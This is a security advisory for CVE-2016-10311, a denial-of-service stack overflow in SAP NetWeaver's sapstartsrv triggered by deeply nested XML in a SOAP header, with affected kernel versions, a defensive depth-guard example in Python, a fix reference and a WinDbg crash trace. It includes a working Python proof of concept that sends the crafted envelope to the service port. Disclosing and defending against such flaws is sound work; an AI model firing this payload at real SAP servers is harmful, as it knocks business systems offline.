Application: SAP NetWeaver
Versions Affected: SAP NetWeaver 7.0-7.5
Vendor URL: SAP
Bugs: buffer overflow
Reported: 09.03.2016
Vendor response: 10.03.2016
Date of Public Advisory: 12.07.2016
Reference: SAP Security Note 2295238
Author: Dmitry Yudin (ERPScan)
Class: Denial of Service
Impact: DoS
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2016-10311
CVSS Base Score v3: 6.5 / 10
CVSS Base Vector:

| Metric | Value |
|---|---|
| AV: Attack Vector (related exploit range) | Network (N) |
| AC: Attack Complexity (required attack complexity) | Low (L) |
| PR: Privileges Required (level of privileges needed to exploit) | None (N) |
| UI: User Interaction (required user participation) | None (N) |
| S: Scope (change in scope due to impact caused to components beyond the vulnerable component) | Unchanged (U) |
| C: Impact to Confidentiality | None (N) |
| I: Impact to Integrity | Low (L) |
| A: Impact to Availability | Low (L) |
This vulnerability allows an attacker to send a specially crafted request to the SAPSTARTSRV process port and trigger a stack buffer overflow through unbounded recursion on the SAP server.
An attacker can use a buffer overflow vulnerability to inject specially crafted code into working memory, where it is executed by the vulnerable application. Executed commands run with the same privileges as the service that executed them. This can lead to complete control of the application, denial of service, command execution, and other attacks. In the case of command execution, an attacker can obtain critical technical and business-related information stored in the vulnerable SAP system or use it for privilege escalation. In the case of denial of service, the process of the vulnerable component can be terminated; while it is down nobody can use the service, which negatively affects business processes and results in system downtime and reputational damage.
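The root cause described above is a parser whose stack use grows with the nesting depth chosen by the client. The following added example (not part of the advisory and not SAP's or ERPScan's code) contrasts the vulnerable pattern with the mitigation: a naive recursive tree walk that exhausts the interpreter stack on a deeply nested document, beside a streaming depth guard built on Python's iterative expat parser that rejects the request as soon as a nesting limit is crossed, before the rest of the payload is processed. `MAX_DEPTH`, `build_envelope` and the sample envelope it produces are assumptions constructed for the demonstration; the envelope only mirrors the shape of the request shown later on this page.

```python
import xml.parsers.expat
import xml.etree.ElementTree as ET

# Assumed policy value: legitimate SOAP requests to a control service are a
# handful of levels deep, so anything beyond this is rejected up front.
MAX_DEPTH = 256


class NestingTooDeep(ValueError):
    """Raised when element nesting exceeds the configured limit."""


def recursive_depth(elem):
    """Naive recursive tree walk: one stack frame per nesting level.

    This is the vulnerable pattern: nesting depth picked by the client
    translates directly into stack consumption on the server.
    """
    return 1 + max((recursive_depth(child) for child in elem), default=0)


def naive_walker_overflows(xml_bytes):
    """True if the recursive walker exhausts the interpreter stack."""
    root = ET.fromstring(xml_bytes)  # tree construction itself is iterative
    try:
        recursive_depth(root)
        return False
    except RecursionError:
        return True


def check_nesting_depth(xml_bytes, max_depth=MAX_DEPTH):
    """Stream the document through expat (iterative, no recursion) and return
    the deepest element level seen; raise NestingTooDeep the moment the limit
    is crossed so the remainder of the payload is never parsed."""
    parser = xml.parsers.expat.ParserCreate()
    depth = 0
    deepest = 0

    def start_element(name, attrs):
        nonlocal depth, deepest
        depth += 1
        deepest = max(deepest, depth)
        if depth > max_depth:
            raise NestingTooDeep(
                f"element nesting {depth} exceeds limit {max_depth} at <{name}>")

    def end_element(name):
        nonlocal depth
        depth -= 1

    parser.StartElementHandler = start_element
    parser.EndElementHandler = end_element
    parser.Parse(xml_bytes, True)
    return deepest


def exceeds_limit(xml_bytes, max_depth=MAX_DEPTH):
    """Convenience wrapper: True when the guard would reject the request."""
    try:
        check_nesting_depth(xml_bytes, max_depth)
        return False
    except NestingTooDeep:
        return True


def build_envelope(nesting):
    """Constructed sample request shaped like a sapstartsrv SOAP envelope,
    with `nesting` levels of <a> inside the Session header (hypothetical)."""
    payload = "<a>" * nesting + "</a>" * nesting
    return (
        '<?xml version="1.0" encoding="utf-8"?>'
        '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">'
        '<SOAP-ENV:Header>'
        '<sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/features/session/">'
        + payload +
        '</sapsess:Session></SOAP-ENV:Header>'
        '<SOAP-ENV:Body><ns1:WW xmlns:ns1="urn:SAPControl"><b></b><e></e></ns1:WW>'
        '</SOAP-ENV:Body></SOAP-ENV:Envelope>'
    ).encode("utf-8")


if __name__ == "__main__":
    benign = build_envelope(2)
    hostile = build_envelope(5000)
    print("benign depth:", check_nesting_depth(benign))
    print("hostile rejected by guard:", exceeds_limit(hostile))
    print("hostile overflows naive walker:", naive_walker_overflows(hostile))
```

The guard is the check a front-end proxy or the service itself should apply to untrusted XML: enforce a depth budget in the tokenizer rather than trusting a recursive-descent layer to survive whatever nesting arrives. The same idea applies to native parsers, where the failure is a hard crash of the process rather than a catchable RecursionError.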
SAP KERNEL 7.21 32-BIT
SAP KERNEL 7.21 32-BIT UNICODE
SAP KERNEL 7.21 64-BIT
SAP KERNEL 7.21 64-BIT UNICODE
SAP KERNEL 7.21 EXT 32-BIT
SAP KERNEL 7.21 EXT 32-BIT UC
SAP KERNEL 7.21 EXT 64-BIT
SAP KERNEL 7.21 EXT 64-BIT UC
SAP KERNEL 7.22 64-BIT
SAP KERNEL 7.22 64-BIT UNICODE
SAP KERNEL 7.22 EXT 64-BIT
SAP KERNEL 7.22 EXT 64-BIT UC
SAP KERNEL 7.42 64-BIT
SAP KERNEL 7.42 64-BIT UNICODE
SAP KERNEL 7.45 64-BIT
SAP KERNEL 7.45 64-BIT UNICODE
To correct this vulnerability, install SAP Security Note 2295238.
```python
import socket

# Placeholders: set to the address and sapstartsrv SOAP port of the test system.
SAP_IP = "SAP_IP"
SAP_PORT = 0

# Envelope whose Session header carries 100000 nested <a> elements.
PoC = """<?xml version="1.0" encoding="utf-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Header>
<sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/features/session/">
""" + "<a>" * 100000 + "</a>" * 100000 + """</sapsess:Session>
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<ns1:WW xmlns:ns1="urn:SAPControl">
<b></b>
<e><e>
</ns1:WW>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""

for i in range(1, 5):
    sock = socket.socket()
    sock.connect((SAP_IP, SAP_PORT))
    sock.sendall(PoC.encode("utf-8"))  # sockets take bytes on Python 3
    sock.close()
```
Windbg exceptions

```text
sapstartsrv!soap_getutf8+0xa:
000000014009cd2a e891f9ffff call sapstartsrv!soap_get (00000001`4009c6c0)
rax=0000000000000000 rbx=000000000bcdcfb0 rcx=000000000bcdcfb0
rdx=0000000000000061 rsi=0000000000000000 rdi=000000000bcdcfb0
rip=000000014009cd2a rsp=0000000002b93ff0 rbp=000000000bcdcfb0
r8=0000000134936c69  r9=0000000000000000 r10=0000000000000000
r11=000000014061ee28 r12=0000000000000000 r13=000000000000270f
r14=00000001409f8ba0 r15=0000000000000000
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
```